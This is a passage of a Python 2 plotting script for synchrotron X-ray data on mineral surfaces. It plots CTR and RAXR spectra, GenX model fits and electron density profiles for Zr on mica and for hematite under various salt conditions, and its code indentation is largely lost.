#pyplot.title('(00L)',weight=4,size=fontsize,clip_on=True)
#ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
for label in ax.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
ax.plot([0.35,0.35],[0,100],':',color='black')
ax.plot([0.87,0.87],[0,100],':',color='black')
pyplot.xlim((0,6))
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_ctrs.png'),dpi=300)
return fig
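#The hard-coded scale=0.3141 used in several plotting functions above corresponds to q = 2*pi*L/d(001) with
#d(001) close to 20.0 Angstrom; a minimal sketch of the same conversion (the default c value below is taken
#from the c_projected defaults used above and is illustrative only):
def _l_to_q_sketch(l, c_projected=19.9597):
    import numpy as np
    return np.asarray(l, dtype=float) * 2.0 * np.pi / c_projected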
def plot_RAXR_matlab_output_single_data_set(file_head='M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit',glob_head='mica_zr_0NaCl_MD_May04_fit',L_list=[0.41,0.53,0.61,0.75,0.88,1.15,1.45,1.71,2.31,2.64,2.85,3.21,3.55,4.24,4.55,5.61,6.25,7.31,9.15,10.31,11.15],c_projected=19.9597,offset=8,start_plot=0,num_plots=21):
#file_head for 0mM NaCl:'M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit',glob_head:'mica_zr_0NaCl_MD_May04_fit'
#file_head for 1mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\1mM_NaCl_Zr_mica', glob_head:'mica_zr_1mM_NaCl_MD_May03_fit'
#file_head for 10mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\10mM_NaCl_Zr_mica', glob_head:'mica_zr_10mM_NaCl_MD_May04_fit'
#file_head for 100mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\100mM_NaCl_Zr_mica', glob_head:'mica_zr_100mM_NaCl_MD_1peak_May04_fit','mica_zr_100mM_NaCl_MD_May04_fit'
hfont = {'fontname':['times new roman','Helvetica'][0]}
files=glob.glob(os.path.join(file_head,glob_head)+'*_norm2')
files_sorted=[]
index_list=[]
for each_file in files:
index_list.append(int(each_file.split('_')[-2]))
for i in range(1,len(files)+1):
for j in range(len(index_list)):
if i==index_list[j]:
files_sorted.append(files[index_list[j]-1])
break
fig=pyplot.figure(figsize=(7,9))
ax=fig.add_subplot(1,1,1)
y_lim_max=170
y_lim_min=0
for i in range(len(files_sorted)):
if i in range(start_plot,num_plots+start_plot):
file=files_sorted[i]
data=np.loadtxt(file)
avg=np.average(data[:,1])
ax.scatter(data[:,0],data[:,1]-avg+i*offset,facecolors='none')
ax.errorbar(data[:,0],data[:,1]-avg+i*offset,yerr=data[:,2],fmt=None)
ax.plot(data[:,0],data[:,3]-avg+i*offset)
ax.annotate('q='+str(round(L_list[i]*np.pi*2/c_projected,3))+' (+'+str(i*offset)+')',xy=(18.13,data[:,3][-1]-avg+i*offset),xytext=(18.13,data[:,3][-1]-avg+i*offset),fontsize=10,**hfont)
y_lim_max=data[:,3][-1]-avg+i*offset+offset
if i==start_plot:
y_lim_min=data[:,3][-1]-avg+i*offset-offset
for label in ax.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
pyplot.xlim((17.9,18.2))
pyplot.ylim((y_lim_min,y_lim_max))
pyplot.xlabel(r'$\rm{Energy(keV)}$',axes=ax,fontsize=13,**hfont)
pyplot.ylabel(r'$\rm{Intensity}$',axes=ax,fontsize=13,**hfont)
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plot_RAXR_matlab_output_multiple_data_sets(file_heads=['M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit','M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\1mM_NaCl_Zr_mica','M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\10mM_NaCl_Zr_mica','M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\100mM_NaCl_Zr_mica'],glob_heads=['mica_zr_0NaCl_MD_May04_fit','mica_zr_1mM_NaCl_MD_May03_fit','mica_zr_10mM_NaCl_MD_May04_fit','mica_zr_100mM_NaCl_MD_May04_fit'],L_list=[0.41,0.53,0.61,0.75,0.88,1.15,1.45,1.71,2.31,2.64,2.85,3.21,3.55,4.24,4.55,5.61,6.25,7.31,9.15,10.31,11.15],c_projected=19.9597,offset=8,start_plot=0,num_plots=3,color_type=1):
#file_head for 0mM NaCl:'M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit',glob_head:'mica_zr_0NaCl_MD_May04_fit'
#file_head for 1mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\1mM_NaCl_Zr_mica', glob_head:'mica_zr_1mM_NaCl_MD_May03_fit'
#file_head for 10mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\10mM_NaCl_Zr_mica', glob_head:'mica_zr_10mM_NaCl_MD_May04_fit'
#file_head for 100mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\100mM_NaCl_Zr_mica', glob_head:'mica_zr_100mM_NaCl_MD_1peak_May04_fit','mica_zr_100mM_NaCl_MD_May04_fit'
hfont = {'fontname':['times new roman','Helvetica'][0]}
colors=set_color(num_plots*2,color_type)
fig=pyplot.figure(figsize=(4,6))
y_lim_max=170
y_lim_min=0
for q_plot in range(num_plots):
ax=fig.add_subplot(num_plots,1,q_plot+1)
for i_plot in range(len(file_heads)):
file_head=file_heads[i_plot]
glob_head=glob_heads[i_plot]
files=glob.glob(os.path.join(file_head,glob_head)+'*_norm2')
files_sorted=[]
index_list=[]
for each_file in files:
index_list.append(int(each_file.split('_')[-2]))
for i in range(1,len(files)+1):
for j in range(len(index_list)):
if i==index_list[j]:
files_sorted.append(files[index_list[j]-1])
break
i=q_plot+start_plot
file=files_sorted[i]
data=np.loadtxt(file)
avg=np.average(data[:,1])
ax.scatter(data[:,0],data[:,1]-avg+i_plot*offset,facecolors='none',edgecolors=colors[i_plot],alpha=0.5)
ax.errorbar(data[:,0],data[:,1]-avg+i_plot*offset,yerr=data[:,2],fmt=None,alpha=0.5,ecolor=colors[i_plot])
ax.plot(data[:,0],data[:,3]-avg+i_plot*offset,color=colors[i_plot])
#ax.annotate('(+'+str(i_plot*offset)+')',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
if i_plot==0:
ax.annotate(r'$\rm{(+0)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
elif i_plot==1:
ax.annotate(r'$\rm{(+8)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
elif i_plot==2:
ax.annotate(r'$\rm{(+16)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
elif i_plot==3:
ax.annotate(r'$\rm{(+24)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
y_lim_max=data[:,3][-1]-avg+i_plot*offset+offset*1.5
if i_plot==0:
print i,i_plot
y_lim_min=data[:,3][-1]-avg+i_plot*offset-offset
pyplot.xlim((17.9,18.17))
pyplot.ylim((y_lim_min,y_lim_max+9))
q_value=str(round(L_list[q_plot+start_plot]*np.pi*2/c_projected,3))
if q_plot==0:
ax.annotate(r'$\rm{q=0.129\ \AA^{-1}}$',xy=(18.,y_lim_max),xytext=(18.,y_lim_max),fontsize=10,**hfont)
elif q_plot==1:
ax.annotate(r'$\rm{q=0.167\ \AA^{-1}}$',xy=(18.,y_lim_max),xytext=(18.,y_lim_max),fontsize=10,**hfont)
elif q_plot==2:
ax.annotate(r'$\rm{q=0.192\ \AA^{-1}}$',xy=(18.,y_lim_max),xytext=(18.,y_lim_max),fontsize=10,**hfont)
if q_plot==num_plots-1:pyplot.xlabel(r'$\rm{Energy(keV)}$',axes=ax,fontsize=13,**hfont)
pyplot.ylabel(r'$\rm{Intensity}$',axes=ax,fontsize=13,**hfont)
for label in ax.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
#pyplot.title('q='+str(round(L_list[q_plot+start_plot]*np.pi*2/c_projected,3))+r'$\rm{\ \AA^{-1}}$',fontsize=10,**hfont)
#pyplot.rcParams.update({'font.size': 10})
fig.tight_layout()
fig.savefig(os.path.join(file_heads[0],'multiple_raxrs_multiple_data.png'),dpi=300)
return fig
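#A compact illustrative alternative to the index-based file-sorting loops used in the two matlab-output
#RAXR plotters above: files named '..._<index>_norm2' are simply ordered by that embedded integer index.
#This is a sketch of the intended ordering, not claimed to be byte-for-byte identical to the loops above.
def _sort_norm2_files_sketch(files):
    return sorted(files, key=lambda f: int(f.split('_')[-2]))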
def plotting_modelB(object=[],fig=None,index=[2,3,1],color=['0.35','r','c','m','k'],l_dashes=[()],lw=3,label=['Experimental data','Model fit'],title=['10L'],marker=['o'],legend=True,fontsize=10):
    #Overlay the experimental and model-fit CTR profiles; the data used were exported from GenX and should first be read with loadtxt(file,skiprows=3).
    #object=[data1,data2,data3]: multiple datasets, the first one being the experimental data and the rest being model datasets.
ax=fig.add_subplot(index[0],index[1],index[2])
ax.set_yscale('log')
ax.scatter(object[0][:,0],object[0][:,1],marker='o',s=3,facecolors='none',edgecolors=color[0],label=label[0],alpha=0.5)
ax.errorbar(object[0][:,0],object[0][:,1],yerr=object[0][:,2],fmt=None,ecolor=color[0],alpha=0.5)
for i in range(len(object)-1):#first item is experiment data (L, I, err) while the second one is simulated result (L, I_s)
l,=ax.plot(object[i+1][:,0],object[i+1][:,1],color=color[i+1],lw=lw,label=label[i+1])
l.set_dashes(l_dashes[i])
if index[2] in [7,8,9]:
pyplot.xlabel('L(r.l.u)',axes=ax,fontsize=12)
if index[2] in [1,4,7]:
pyplot.ylabel(r'$\rm{|F_{HKL}|}$',axes=ax,fontsize=12)
#settings for demo showing
pyplot.title('('+title[0]+')',position=(0.5,0.82),weight=4,size=10,clip_on=True)
#pyplot.ylim((1,1000))
#settings for publication
#pyplot.title('('+title[0]+')',position=(0.5,1.001),weight=4,size=10,clip_on=True)
"""##add arrows to antidote the misfits
if title[0]=='0 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.25,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
ax.add_patch(mpt.patches.FancyArrow(0.83,0.5,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='1 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.68,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='3 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.375,0.8,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
"""
if legend==True:
#ax.legend()
ax.legend(bbox_to_anchor=(0.2,1.03,3.,1.202),mode='expand',loc=3,ncol=5,borderaxespad=0.,prop={'size':9})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
#plot normalized data now
if index[0]==2 and index[1]==1:
ax=fig.add_subplot(index[0],index[1],index[2]+1)
ax.set_yscale('log')
ax.scatter(object[0][:,0],object[0][:,3],marker='o',s=20,facecolors='none',edgecolors=color[0],label=label[0])
ax.errorbar(object[0][:,0],object[0][:,3],yerr=object[0][:,4],fmt=None,ecolor=color[0])
for i in range(len(object)-1):#first item is experiment data (L, I, err) while the second one is simulated result (L, I_s)
l,=ax.plot(object[i+1][:,0],object[i+1][:,2],color=color[i+1],lw=lw,label=label[i+1])
l.set_dashes(l_dashes[i])
if index[2] in [7,8,9]:
pyplot.xlabel(r'$\rm{L(r.l.u)}$',axes=ax,fontsize=12)
if index[2] in [1,4,7]:
pyplot.ylabel(r'$|normalized F_{HKL}|$',axes=ax,fontsize=12)
#settings for demo showing
if index[0]==2 and index[1]==1:
pass
else:
if title[0]=='0 0 L':
pyplot.ylim((1,50000))
xtick_labels=ax.get_xticks().tolist()
x_tick_new=[]
for each in xtick_labels:
if each in [1.0,2.0,3.,4.,5.]:
x_tick_new.append(int(each))
else:
x_tick_new.append('')
ax.set_xticklabels(x_tick_new)
#pyplot.xlim((0,20))
elif title[0]=='3 0 L':
pyplot.ylim((1,5000))
elif title[0] in ['2 1 L','2 -1 L']:
pyplot.ylim((1,10000))
else:pyplot.ylim((1,50000))
#pyplot.ylim((1,1000))
#settings for publication
#pyplot.title('('+title[0]+')',position=(0.5,1.001),weight=4,size=10,clip_on=True)
"""##add arrows to antidote the misfits
if title[0]=='0 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.25,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
ax.add_patch(mpt.patches.FancyArrow(0.83,0.5,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='1 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.68,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='3 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.375,0.8,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
"""
if legend==True:
#ax.legend()
ax.legend(bbox_to_anchor=(0.2,1.03,3.,1.202),mode='expand',loc=3,ncol=5,borderaxespad=0.,prop={'size':9})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
#ax.set_ylim([1,10000])
#object files are dumped from GenX when the plot switch is turned on
def plotting_many_modelB(save_file='D://pic.png',head='P:\\My stuff\\Manuscripts\\hematite rcut\\v10\dump_files\\',object_files=['temp_plot_O1O3_O5O7','temp_plot_O1O3_O5O8','temp_plot_O1O4_O5O7','temp_plot_O1O4_O5O8'],index=[3,3],color=['blue','#e41a1c','#4daf4a','#984ea3','#ff7f00'],lw=1.5,l_dashes=[(None,None),(None,None),(None,None),(None,None),(None,None),(None,None)],label=['Experimental data','Model1 results','Model2 results','Model3','Model4','Model5','Model6'],marker=['p'],title=['0 0 L','0 2 L','1 0 L','1 1 L','2 0 L','2 2 L','3 0 L','2 -1 L','2 1 L'],legend=[False,False,False,False,False,False,False,False,False],fontsize=10):
    #Plot several model results simultaneously; object_files=[file1,file2,file3], where each file is the path of a dumped data/model file
#setting for demo show
#fig=pyplot.figure(figsize=(10,9))
#settings for publication
#fig=pyplot.figure(figsize=(10,7))
fig=pyplot.figure(figsize=(8,6))
object_sets=[pickle.load(open(os.path.join(head,file))) for file in object_files]#each_item=[00L,02L,10L,11L,20L,22L,30L,2-1L,21L]
object=[]
for i in range(len(object_sets[0])):
object.append([])
for j in range(len(object_sets)):
if j==0:
object[-1].append(object_sets[j][i][0])
object[-1].append(object_sets[j][i][1])
if len(object_sets[0])==1:#case for plotting muscovite (assuming there is one specular rod)
index=[2,1]
else:#case for plotting hematite (9 rods in total including one specular rod)
index=[3,3]
for i in range(len(object)):
#for i in range(1):
order=i
#print 'abc'
ob=object[i]
plotting_modelB(object=ob,fig=fig,index=[index[0],index[1],i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
#plotting_modelB(object=ob,fig=fig,index=[1,1,i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
fig.tight_layout()
fig.savefig(save_file,dpi=300)
return fig
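#Usage sketch (these are the same defaults that plot_all below passes in; PATH is the module path):
#    plotting_many_modelB(save_file=os.path.join(PATH, "temp_plot_ctr.png"), head=PATH,
#                         object_files=["temp_plot"], color=['b','r'], l_dashes=[(None,None)], lw=2)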
def plotting_many_modelB_2(save_file='D://pic.png',fig_size=(8,6),head='P:\\My stuff\\Manuscripts\\hematite rcut\\pb on cmp rcut v10\dump_files\\',object_files=['temp_plot_O1O3_O5O7','temp_plot_O1O3_O1O4_no_water_Oct12'],index=[3,3],color=['blue','green','red','#984ea3','#ff7f00'],lw=2.,l_dashes=[(None,None),(None,None),(None,None),(None,None),(None,None),(None,None)],label=['Experimental data','Model1 results','Model2 results','Model3','Model4','Model5','Model6'],marker=['p'],title=['0 0 L','0 2 L','1 0 L','1 1 L','2 0 L','2 2 L','3 0 L','2 -1 L','2 1 L'],legend=[False,False,False,False,False,False,False,False,False],fontsize=10):
    #Plot several model results simultaneously; object_files=[file1,file2,file3], where each file is the path of a dumped data/model file
fig=pyplot.figure(figsize=fig_size)
object_sets=[pickle.load(open(os.path.join(head,file))) for file in object_files]#each_item=[00L,02L,10L,11L,20L,22L,30L,2-1L,21L]
object=[]
for i in range(len(object_sets[0])):
object.append([])
for j in range(len(object_sets)):
if j==0:
object[-1].append(object_sets[j][i][0])
object[-1].append(object_sets[j][i][1])
if len(object_sets[0])==1:#case for plotting muscovite (assuming there is one specular rod)
index=[2,1]
else:#case for plotting hematite (9 rods in total including one specular rod)
pass
for i in range(len(object)):
if i<index[0]*index[1]:
order=i
ob=object[i]
plotting_modelB(object=ob,fig=fig,index=[index[0],index[1],i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
else:
pass
fig.tight_layout()
fig.savefig(save_file,dpi=300)
return fig
def plotting_single_rod(save_file='D://pic.png',head='C:\\Users\\jackey\\Google Drive\\useful codes\\plotting\\',object_files=['temp_plot_O1O2','temp_plot_O5O6','temp_plot_O1O3','temp_plot_O5O7','temp_plot_O1O4','temp_plot_O5O8'],index=[1,1],color=['0.6','b','b','g','g','r','r'],lw=1.5,l_dashes=[(2,2,2,2),(None,None),(2,2,2,2),(None,None),(2,2,2,2),(None,None)],label=['Experimental data','Model1 results','Model2 results','Model3','Model4','Model5','Model6'],marker=['p'],title=['0 0 L','0 2 L','1 0 L','1 1 L','2 0 L','2 2 L','3 0 L','2 -1 L','2 1 L'],legend=[False,False,False,False,False,False,False,False,False],fontsize=10,rod_index=0):
    #Plot a single rod from several model results simultaneously; object_files=[file1,file2,file3], where each file is the path of a dumped data/model file
#setting for demo show
#fig=pyplot.figure(figsize=(10,9))
#settings for publication
#fig=pyplot.figure(figsize=(10,7))
fig=pyplot.figure(figsize=(8.5,7))
object_sets=[pickle.load(open(head+file)) for file in object_files]#each_item=[00L,02L,10L,11L,20L,22L,30L,2-1L,21L]
object=[]
for i in range(9):
object.append([])
for j in range(len(object_sets)):
if j==0:
object[-1].append(object_sets[j][i][0])
object[-1].append(object_sets[j][i][1])
for i in [rod_index]:
#for i in range(1):
order=i
#print 'abc'
ob=object[i]
plotting_modelB(object=ob,fig=fig,index=[index[0],index[1],i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=None,fontsize=fontsize)
#plotting_modelB(object=ob,fig=fig,index=[1,1,i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
fig.tight_layout()
fig.savefig(save_file,dpi=300)
return fig
#overplot experimental data formatted with the UAF_CTR_RAXS_2 loader in GenX
def plot_many_experiment_data(data_files=['D:\\Google Drive\\data\\400uM_Sb_hematite_rcut.datnew_formate','D:\\Google Drive\\data\\1000uM_Pb_hematite_rcut.datnew_formate'],labels=['Sb 400uM on hematite','Pb 1000uM on hematite'],HKs=[[0,0],[0,2],[1,0],[1,1],[2,0],[2,1],[2,-1],[2,2],[3,0]],index_subplot=[3,3],colors=['b','g','r','c','m','y','w'],markers=['.','*','o','v','^','<','>'],fontsize=10):
data_container={}
for i in range(len(labels)):
temp_data=np.loadtxt(data_files[i])
sub_set={}
for HK in HKs:
label=str(int(HK[0]))+'_'+str(int(HK[1]))
sub_set[label]=np.array(filter(lambda x:x[1]==HK[0] and x[2]==HK[1],temp_data))
data_container[labels[i]]=sub_set
fig=pyplot.figure()
for i in range(len(HKs)):
title=str(int(HKs[i][0]))+str(int(HKs[i][1]))+'L'
ax=fig.add_subplot(index_subplot[0],index_subplot[1],i+1)
ax.set_yscale('log')
for label in labels:
data_temp=data_container[label][str(int(HKs[i][0]))+'_'+str(int(HKs[i][1]))]
ax.errorbar(data_temp[:,0],data_temp[:,4],data_temp[:,5],label=label,marker=markers[labels.index(label)],ecolor=colors[labels.index(label)],color=colors[labels.index(label)],markerfacecolor=colors[labels.index(label)],linestyle='None',markersize=8)
pyplot.title(title,position=(0.5,0.85),weight='bold',clip_on=True)
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
if i==0:
ax.legend(bbox_to_anchor=(0.5,0.92,0,3),bbox_transform=fig.transFigure,loc='lower center',ncol=4,borderaxespad=0.,prop={'size':14})
if (i+1)>index_subplot[1]*(index_subplot[0]-1):
pyplot.xlabel('L',axes=ax,fontsize=fontsize)
if i%index_subplot[1]==0:
pyplot.ylabel('|F|',axes=ax,fontsize=fontsize)
return True
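#An assumed-equivalent numpy formulation of the per-rod row selection used in plot_many_experiment_data
#(select the rows of the loaded data whose H and K columns match the requested rod):
def _select_rod_rows_sketch(data, H, K):
    import numpy as np
    data = np.asarray(data, dtype=float)
    return data[(data[:, 1] == H) & (data[:, 2] == K)]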
lateral_size=[5.4,5.1,7.3,8.6]
lateral_size_errors=[0.5,0.1,0.6,0.5]
vertical_size=[0.974,1.61,1.6,2.48]
vertical_size_error=[0.01,0.01,0.01,0.04]
labels=['IS=1.8 mM','IS=2.9 mM','IS=12 mM', 'IS=102 mM']
def plot_NP_size_evolution(file_head=module_path_locator(),lateral=lateral_size,lateral_error=lateral_size_errors,vertical=vertical_size,vertical_error=vertical_size_error,label=labels,color_type=1):
colors=set_color(len(lateral),color_type)
hfont = {'fontname':['times new roman','Helvetica'][0]}
fig=pyplot.figure(figsize=(8,5))
ax=fig.add_subplot(1,1,1)
pyplot.ylabel("Vertical size (nm)",fontsize=12)
pyplot.xlabel("Lateral size (nm)",fontsize=12)
for i in range(len(lateral)):
x,y,x_er,y_er,label,color=lateral[i],vertical[i],lateral_error[i],vertical_error[i],labels[i],colors[i]
ax.errorbar(x,y,xerr=x_er,yerr=y_er,fmt='o',label=label,color=color)
#for i in range(len(lateral)-1):
# ax.arrow(lateral[i],vertical[i],lateral[i+1]-lateral[i],vertical[i+1]-vertical[i],head_width=0.05, head_length=0.2, fc='k', ec='k',ls=':',color=colors[i])
ax.annotate(label,xy=(x-0.4,y+0.05),xytext=(x-0.4,y+0.05),fontsize=12)
#ax.legend(fontsize=12,loc=2)
ax.set_ylim(0.8,2.8)
fig.savefig(os.path.join(file_head,'NP_size_evolution.png'),dpi=300)
return fig
def plot_multiple_e_profiles(file_head=module_path_locator(),dump_files=['temp_plot_eden_0NaCl','temp_plot_eden_1NaCl','temp_plot_eden_10NaCl','temp_plot_eden_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],color_type=5):
colors=set_color(len(dump_files),color_type)
fig=pyplot.figure(figsize=(6,8))
ax1=fig.add_subplot(2,1,1)
pyplot.ylabel("E_density",fontsize=12)
#pyplot.xlabel("Z(Angstrom)",fontsize=12)
pyplot.title('Total e profile',fontsize=12)
ax2=fig.add_subplot(2,1,2)
pyplot.ylabel("e density",fontsize=12)
pyplot.xlabel(r"$\rm{Z(\AA)}$",fontsize=12)
pyplot.title('Zr e profile',fontsize=12)
for i in range(len(dump_files)):
data_eden=pickle.load(open(os.path.join(file_head,dump_files[i]),"rb"))
edata,labels=data_eden[0],data_eden[1]
ax1.plot(np.array(edata[-1][0,:]),edata[-1][1,:]+i,color=colors[i],label="Total e "+label_marks[i],lw=2)
ax2.fill_between(np.array(edata[-1][0,:]),edata[-1][2,:]*0+i,edata[-1][2,:]+i,color=colors[i],label="Zr e profile (MD) "+label_marks[i],alpha=0.6)
ax1.legend(fontsize=12)
ax2.legend(fontsize=12)
ax2.set_ylim(0,6)
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_eprofiles.png'),dpi=300)
return fig
dump_files_genx_0=['temp_plot_eden_0NaCl_0502','temp_plot_eden_1NaCl_0502','temp_plot_eden_10NaCl_0502','temp_plot_eden_100NaCl_0502']
labels_genx_0=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl']
dump_files_genx_1=['temp_plot_eden_100mM_NH4Cl_Jul10_2017','temp_plot_eden_100mM_CH5NCl_Jul23_2017','temp_plot_eden_100mM_LiCl_Jul10_2017','temp_plot_eden_100mM_NaCl_Jul10_2017','temp_plot_eden_100mM_KCl_Jul23_2017','temp_plot_eden_100mM_RbCl_Jul10_2017','temp_plot_eden_32mM_MgCl2_Jul10_2017','temp_plot_eden_32mM_CaCl2_Jul10_2017']
labels_genx_1=['100 mM NH4Cl (2.4 Zr/AUC)','100 mM CH5NCl (4.4 Zr/AUC)','100 mM LiCl (2.1 Zr/AUC)','100 mM NaCl (3.7 Zr/AUC)','100 mM KCl (3.9 Zr/AUC)','100 mM RbCl (3.9 Zr/AUC)','32 mM MgCl2 (2.4 Zr/AUC)','32 mM CaCl2 (3.9 Zr/AUC)']
dump_files_genx_2=['temp_plot_eden_100LiCl_Oct4_2017','temp_plot_eden_100NaCl_Oct4_2017','temp_plot_eden_100KCl_Oct4_2017','temp_plot_eden_100RbCl_Oct4_2017','temp_plot_eden_100CsCl_Oct4_2017']
labels_genx_2=[r'100 mM LiCl [5.04(0.01) Zr/AUC]',r'100 mM NaCl [4.57(0.6) Zr/AUC]',r'100 mM KCl [3.92(1) Zr/AUC]',r'100 mM RbCl [2.26(0.15) Zr/AUC]',r'100 mM CsCl [1.58(0.8) Zr/AUC]']
dump_files_genx_3=['temp_plot_eden_100LiCl_Oct5_2017','temp_plot_eden_100NaCl_Oct5_2017','temp_plot_eden_100RbCl_Zr_Oct5_2017','temp_plot_eden_100RbCl_Rb_Oct5_2017','temp_plot_eden_100CsCl_Oct5_2017']
labels_genx_3=[r'100 mM LiCl [4.40(1) Zr/AUC]',r'100 mM NaCl [3.98(0.68) Zr/AUC]',r'100 mM RbCl [2.23(0.04) Zr/AUC]',r'100 mM RbCl [~1.0(0.1) Rb/AUC]',r'100 mM CsCl [1.56(0.04) Zr/AUC]']
dump_files_genx_4=['temp_plot_eden_100LiCl_Oct5_2017','temp_plot_eden_100NaCl_Oct5_2017','temp_plot_eden_100NH4Cl_Zr_Oct10_2017','temp_plot_eden_100KCl_Zr_Oct10_2017','temp_plot_eden_100RbCl_Zr_Oct5_2017','temp_plot_eden_100RbCl_Rb_Oct10_2017','temp_plot_eden_100CsCl_Oct5_2017']
labels_genx_4=[r'100 mM LiCl [4.40(1) Zr/AUC]',r'100 mM NaCl [3.98(0.68) Zr/AUC]',r'100 mM NH4Cl [3.0(0.8) Zr/AUC]',r'100 mM KCl [3.6(0.1) Zr/AUC]',r'100 mM RbCl [2.23(0.04) Zr/AUC]',r'100 mM RbCl [0.66(0.01) Rb/AUC]',r'100 mM CsCl [1.56(0.04) Zr/AUC]']
def plot_multiple_e_profiles_2(file_head=module_path_locator(),dump_files=dump_files_genx_4,label_marks=labels_genx_4,color_type=1):
    def _cal_percentage_(data,cutoff=5,label=''):#used to calculate the percentage of the resonant-element profile area within the cutoff distance from the mineral surface
z,e=data[0],data[1]
total_area=0
target_area=0
for i in range(len(z))[1:]:
x1,y1=z[i],e[i]
x0,y0=z[i-1],e[i-1]
area=abs(x1-x0)*min([y0,y1])+abs(x1-x0)*abs(y1-y0)/2
total_area+=area
if x1<=cutoff:
target_area+=area
print '<<Case of '+label+'>>'
print 'The percentage of area plot within '+str(cutoff)+' A is:'+str(target_area/total_area*100)+'%'
return None
colors=set_color(len(dump_files),color_type)
fig=pyplot.figure(figsize=(5,9))
ax1=fig.add_subplot(1,1,1)
hfont = {'fontname':['times new roman','Helvetica'][0]}
pyplot.ylabel(r"$\rm{Normalized\ Electron\ Density}$",fontsize=12,**hfont)
